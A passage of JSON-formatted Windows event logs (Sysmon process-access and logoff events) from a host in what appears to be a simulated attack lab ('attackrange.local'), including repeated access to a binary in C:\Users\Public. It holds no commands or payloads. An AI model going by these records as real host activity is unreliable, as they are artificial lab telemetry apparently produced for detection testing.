{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.667\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.667","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220658,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88388\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x88388","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220659,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x880C7\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x880c7","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220660,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90A13\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x90a13","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:24.527\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:24.527","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:25.527\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:25.527","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:26.527\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:26.527","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:27.527\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:27.527","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:28.527\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:28.527","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 